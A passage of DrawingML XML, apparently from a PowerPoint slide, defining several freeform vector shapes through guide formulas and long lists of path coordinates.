                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="405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1" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2955925" y="1952625"/>
                <a:ext cx="236538" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 658"/>
                  <a:gd name="T1" fmla="*/ 0 h 604"/>
                  <a:gd name="T2" fmla="*/ 189 w 658"/>
                  <a:gd name="T3" fmla="*/ 78 h 604"/>
                  <a:gd name="T4" fmla="*/ 89 w 658"/>
                  <a:gd name="T5" fmla="*/ 189 h 604"/>
                  <a:gd name="T6" fmla="*/ 0 w 658"/>
                  <a:gd name="T7" fmla="*/ 105 h 604"/>
                  <a:gd name="T8" fmla="*/ 95 w 658"/>
                  <a:gd name="T9" fmla="*/ 0 h 604"/>
                  <a:gd name="T10" fmla="*/ 236 w 658"/>
                  <a:gd name="T11" fmla="*/ 126 h 604"/>
                  <a:gd name="T12" fmla="*/ 657 w 658"/>
                  <a:gd name="T13" fmla="*/ 493 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 658"/>
                  <a:gd name="T15" fmla="*/ 603 h 604"/>
                  <a:gd name="T16" fmla="*/ 142 w 658"/>
                  <a:gd name="T17" fmla="*/ 231 h 604"/>
                  <a:gd name="T18" fmla="*/ 236 w 658"/>
                  <a:gd name="T19" fmla="*/ 126 h 6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58" h="604">
                    <a:moveTo>
                      <a:pt x="95" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="236" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="657" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126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2" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3094038" y="1884363"/>
                <a:ext cx="198437" cy="200025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 237 w 553"/>
                  <a:gd name="T1" fmla="*/ 142 h 557"/>
                  <a:gd name="T2" fmla="*/ 205 w 553"/>
                  <a:gd name="T3" fmla="*/ 126 h 557"/>
                  <a:gd name="T4" fmla="*/ 174 w 553"/>
                  <a:gd name="T5" fmla="*/ 120 h 557"/>
                  <a:gd name="T6" fmla="*/ 158 w 553"/>
                  <a:gd name="T7" fmla="*/ 126 h 557"/>
                  <a:gd name="T8" fmla="*/ 142 w 553"/>
                  <a:gd name="T9" fmla="*/ 136 h 557"/>
                  <a:gd name="T10" fmla="*/ 121 w 553"/>
                  <a:gd name="T11" fmla="*/ 178 h 557"/>
                  <a:gd name="T12" fmla="*/ 121 w 553"/>
                  <a:gd name="T13" fmla="*/ 199 h 557"/>
                  <a:gd name="T14" fmla="*/ 132 w 553"/>
                  <a:gd name="T15" fmla="*/ 220 h 557"/>
                  <a:gd name="T16" fmla="*/ 164 w 553"/>
                  <a:gd name="T17" fmla="*/ 267 h 557"/>
                  <a:gd name="T18" fmla="*/ 221 w 553"/>
                  <a:gd name="T19" fmla="*/ 330 h 557"/>
                  <a:gd name="T20" fmla="*/ 289 w 553"/>
                  <a:gd name="T21" fmla="*/ 388 h 557"/>
                  <a:gd name="T22" fmla="*/ 315 w 553"/>
                  <a:gd name="T23" fmla="*/ 409 h 557"/>
                  <a:gd name="T24" fmla="*/ 342 w 553"/>
                  <a:gd name="T25" fmla="*/ 425 h 557"/>
                  <a:gd name="T26" fmla="*/ 384 w 553"/>
                  <a:gd name="T27" fmla="*/ 430 h 557"/>
                  <a:gd name="T28" fmla="*/ 400 w 553"/>
                  <a:gd name="T29" fmla="*/ 425 h 557"/>
                  <a:gd name="T30" fmla="*/ 415 w 553"/>
                  <a:gd name="T31" fmla="*/ 414 h 557"/>
                  <a:gd name="T32" fmla="*/ 431 w 553"/>
                  <a:gd name="T33" fmla="*/ 383 h 557"/>
                  <a:gd name="T34" fmla="*/ 431 w 553"/>
                  <a:gd name="T35" fmla="*/ 351 h 557"/>
                  <a:gd name="T36" fmla="*/ 426 w 553"/>
                  <a:gd name="T37" fmla="*/ 336 h 557"/>
                  <a:gd name="T38" fmla="*/ 373 w 553"/>
                  <a:gd name="T39" fmla="*/ 273 h 557"/>
                  <a:gd name="T40" fmla="*/ 468 w 553"/>
                  <a:gd name="T41" fmla="*/ 173 h 557"/>
                  <a:gd name="T42" fmla="*/ 531 w 553"/>
                  <a:gd name="T43" fmla="*/ 252 h 557"/>
                  <a:gd name="T44" fmla="*/ 552 w 553"/>
                  <a:gd name="T45" fmla="*/ 325 h 557"/>
                  <a:gd name="T46" fmla="*/ 552 w 553"/>
                  <a:gd name="T47" fmla="*/ 362 h 557"/>
                  <a:gd name="T48" fmla="*/ 515 w 553"/>
                  <a:gd name="T49" fmla="*/ 441 h 557"/>
                  <a:gd name="T50" fmla="*/ 478 w 553"/>
                  <a:gd name="T51" fmla="*/ 483 h 557"/>
                  <a:gd name="T52" fmla="*/ 405 w 553"/>
                  <a:gd name="T53" fmla="*/ 541 h 557"/>
                  <a:gd name="T54" fmla="*/ 368 w 553"/>
                  <a:gd name="T55" fmla="*/ 556 h 557"/>
                  <a:gd name="T56" fmla="*/ 326 w 553"/>
                  <a:gd name="T57" fmla="*/ 556 h 557"/>
                  <a:gd name="T58" fmla="*/ 231 w 553"/>
                  <a:gd name="T59" fmla="*/ 520 h 557"/>
                  <a:gd name="T60" fmla="*/ 179 w 553"/>
                  <a:gd name="T61" fmla="*/ 483 h 557"/>
                  <a:gd name="T62" fmla="*/ 121 w 553"/>
                  <a:gd name="T63" fmla="*/ 430 h 557"/>
                  <a:gd name="T64" fmla="*/ 32 w 553"/>
                  <a:gd name="T65" fmla="*/ 320 h 557"/>
                  <a:gd name="T66" fmla="*/ 11 w 553"/>
                  <a:gd name="T67" fmla="*/ 273 h 557"/>
                  <a:gd name="T68" fmla="*/ 0 w 553"/>
                  <a:gd name="T69" fmla="*/ 226 h 557"/>
                  <a:gd name="T70" fmla="*/ 17 w 553"/>
                  <a:gd name="T71" fmla="*/ 142 h 557"/>
                  <a:gd name="T72" fmla="*/ 37 w 553"/>
                  <a:gd name="T73" fmla="*/ 100 h 557"/>
                  <a:gd name="T74" fmla="*/ 69 w 553"/>
                  <a:gd name="T75" fmla="*/ 63 h 557"/>
                  <a:gd name="T76" fmla="*/ 142 w 553"/>
                  <a:gd name="T77" fmla="*/ 10 h 557"/>
                  <a:gd name="T78" fmla="*/ 216 w 553"/>
                  <a:gd name="T79" fmla="*/ 0 h 557"/>
                  <a:gd name="T80" fmla="*/ 258 w 553"/>
                  <a:gd name="T81" fmla="*/ 5 h 557"/>
                  <a:gd name="T82" fmla="*/ 331 w 553"/>
                  <a:gd name="T83" fmla="*/ 42 h 557"/>
                  <a:gd name="T84" fmla="*/ 268 w 553"/>
                  <a:gd name="T85" fmla="*/ 173 h 557"/>
                  <a:gd name="T86" fmla="*/ 237 w 553"/>
                  <a:gd name="T87" fmla="*/ 142 h 5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553" h="557">
                    <a:moveTo>
                      <a:pt x="237" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="237" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="142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3" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3221038" y="1758950"/>
                <a:ext cx="225425" cy="215900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 626"/>
                  <a:gd name="T1" fmla="*/ 331 h 600"/>
                  <a:gd name="T2" fmla="*/ 6 w 626"/>
                  <a:gd name="T3" fmla="*/ 262 h 600"/>
                  <a:gd name="T4" fmla="*/ 0 w 626"/>
                  <a:gd name="T5" fmla="*/ 226 h 600"/>
                  <a:gd name="T6" fmla="*/ 0 w 626"/>
                  <a:gd name="T7" fmla="*/ 194 h 600"/>
                  <a:gd name="T8" fmla="*/ 32 w 626"/>
                  <a:gd name="T9" fmla="*/ 131 h 600"/>
                  <a:gd name="T10" fmla="*/ 53 w 626"/>
                  <a:gd name="T11" fmla="*/ 100 h 600"/>
                  <a:gd name="T12" fmla="*/ 79 w 626"/>
                  <a:gd name="T13" fmla="*/ 74 h 600"/>
                  <a:gd name="T14" fmla="*/ 168 w 626"/>
                  <a:gd name="T15" fmla="*/ 11 h 600"/>
                  <a:gd name="T16" fmla="*/ 205 w 626"/>
                  <a:gd name="T17" fmla="*/ 0 h 600"/>
                  <a:gd name="T18" fmla="*/ 236 w 626"/>
                  <a:gd name="T19" fmla="*/ 0 h 600"/>
                  <a:gd name="T20" fmla="*/ 294 w 626"/>
                  <a:gd name="T21" fmla="*/ 21 h 600"/>
                  <a:gd name="T22" fmla="*/ 320 w 626"/>
                  <a:gd name="T23" fmla="*/ 42 h 600"/>
                  <a:gd name="T24" fmla="*/ 541 w 626"/>
                  <a:gd name="T25" fmla="*/ 284 h 600"/>
                  <a:gd name="T26" fmla="*/ 583 w 626"/>
                  <a:gd name="T27" fmla="*/ 331 h 600"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 352 h 600"/>
                  <a:gd name="T30" fmla="*/ 525 w 626"/>
                  <a:gd name="T31" fmla="*/ 446 h 600"/>
                  <a:gd name="T32" fmla="*/ 499 w 626"/>
                  <a:gd name="T33" fmla="*/ 431 h 600"/>
                  <a:gd name="T34" fmla="*/ 473 w 626"/>
                  <a:gd name="T35" fmla="*/ 415 h 600"/>
                  <a:gd name="T36" fmla="*/ 473 w 626"/>
                  <a:gd name="T37" fmla="*/ 462 h 600"/>
                  <a:gd name="T38" fmla="*/ 467 w 626"/>
                  <a:gd name="T39" fmla="*/ 494 h 600"/>
                  <a:gd name="T40" fmla="*/ 441 w 626"/>
                  <a:gd name="T41" fmla="*/ 530 h 600"/>
                  <a:gd name="T42" fmla="*/ 410 w 626"/>
                  <a:gd name="T43" fmla="*/ 562 h 600"/>
                  <a:gd name="T44" fmla="*/ 352 w 626"/>
                  <a:gd name="T45" fmla="*/ 593 h 600"/>
                  <a:gd name="T46" fmla="*/ 326 w 626"/>
                  <a:gd name="T47" fmla="*/ 599 h 600"/>
                  <a:gd name="T48" fmla="*/ 300 w 626"/>
                  <a:gd name="T49" fmla="*/ 593 h 600"/>
                  <a:gd name="T50" fmla="*/ 247 w 626"/>
                  <a:gd name="T51" fmla="*/ 572 h 600"/>
                  <a:gd name="T52" fmla="*/ 226 w 626"/>
                  <a:gd name="T53" fmla="*/ 556 h 600"/>
                  <a:gd name="T54" fmla="*/ 205 w 626"/>
                  <a:gd name="T55" fmla="*/ 535 h 600"/>
                  <a:gd name="T56" fmla="*/ 168 w 626"/>
                  <a:gd name="T57" fmla="*/ 478 h 600"/>
                  <a:gd name="T58" fmla="*/ 158 w 626"/>
                  <a:gd name="T59" fmla="*/ 452 h 600"/>
                  <a:gd name="T60" fmla="*/ 153 w 626"/>
                  <a:gd name="T61" fmla="*/ 425 h 600"/>
                  <a:gd name="T62" fmla="*/ 163 w 626"/>
                  <a:gd name="T63" fmla="*/ 368 h 600"/>
                  <a:gd name="T64" fmla="*/ 179 w 626"/>
                  <a:gd name="T65" fmla="*/ 341 h 600"/>
                  <a:gd name="T66" fmla="*/ 242 w 626"/>
                  <a:gd name="T67" fmla="*/ 241 h 600"/>
                  <a:gd name="T68" fmla="*/ 252 w 626"/>
                  <a:gd name="T69" fmla="*/ 215 h 600"/>
                  <a:gd name="T70" fmla="*/ 257 w 626"/>
                  <a:gd name="T71" fmla="*/ 194 h 600"/>
                  <a:gd name="T72" fmla="*/ 242 w 626"/>
                  <a:gd name="T73" fmla="*/ 152 h 600"/>
                  <a:gd name="T74" fmla="*/ 216 w 626"/>
                  <a:gd name="T75" fmla="*/ 131 h 600"/>
                  <a:gd name="T76" fmla="*/ 195 w 626"/>
                  <a:gd name="T77" fmla="*/ 126 h 600"/>
                  <a:gd name="T78" fmla="*/ 173 w 626"/>
                  <a:gd name="T79" fmla="*/ 126 h 600"/>
                  <a:gd name="T80" fmla="*/ 147 w 626"/>
                  <a:gd name="T81" fmla="*/ 147 h 600"/>
                  <a:gd name="T82" fmla="*/ 121 w 626"/>
                  <a:gd name="T83" fmla="*/ 178 h 600"/>
                  <a:gd name="T84" fmla="*/ 121 w 626"/>
                  <a:gd name="T85" fmla="*/ 194 h 600"/>
                  <a:gd name="T86" fmla="*/ 142 w 626"/>
                  <a:gd name="T87" fmla="*/ 241 h 600"/>
                  <a:gd name="T88" fmla="*/ 58 w 626"/>
                  <a:gd name="T89" fmla="*/ 341 h 600"/>
                  <a:gd name="T90" fmla="*/ 315 w 626"/>
                  <a:gd name="T91" fmla="*/ 284 h 600"/>
                  <a:gd name="T92" fmla="*/ 300 w 626"/>
                  <a:gd name="T93" fmla="*/ 310 h 600"/>
                  <a:gd name="T94" fmla="*/ 279 w 626"/>
                  <a:gd name="T95" fmla="*/ 347 h 600"/>
                  <a:gd name="T96" fmla="*/ 273 w 626"/>
                  <a:gd name="T97" fmla="*/ 373 h 600"/>
                  <a:gd name="T98" fmla="*/ 300 w 626"/>
                  <a:gd name="T99" fmla="*/ 431 h 600"/>
                  <a:gd name="T100" fmla="*/ 320 w 626"/>
                  <a:gd name="T101" fmla="*/ 452 h 600"/>
                  <a:gd name="T102" fmla="*/ 342 w 626"/>
                  <a:gd name="T103" fmla="*/ 462 h 600"/>
                  <a:gd name="T104" fmla="*/ 368 w 626"/>
                  <a:gd name="T105" fmla="*/ 467 h 600"/>
                  <a:gd name="T106" fmla="*/ 389 w 626"/>
                  <a:gd name="T107" fmla="*/ 452 h 600"/>
                  <a:gd name="T108" fmla="*/ 410 w 626"/>
                  <a:gd name="T109" fmla="*/ 431 h 600"/>
                  <a:gd name="T110" fmla="*/ 420 w 626"/>
                  <a:gd name="T111" fmla="*/ 399 h 600"/>
                  <a:gd name="T112" fmla="*/ 420 w 626"/>
                  <a:gd name="T113" fmla="*/ 383 h 600"/>
                  <a:gd name="T114" fmla="*/ 420 w 626"/>
                  <a:gd name="T115" fmla="*/ 368 h 600"/>
                  <a:gd name="T116" fmla="*/ 399 w 626"/>
                  <a:gd name="T117" fmla="*/ 331 h 600"/>
                  <a:gd name="T118" fmla="*/ 326 w 626"/>
                  <a:gd name="T119" fmla="*/ 247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26" h="600">
                    <a:moveTo>
                      <a:pt x="48" y="331"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
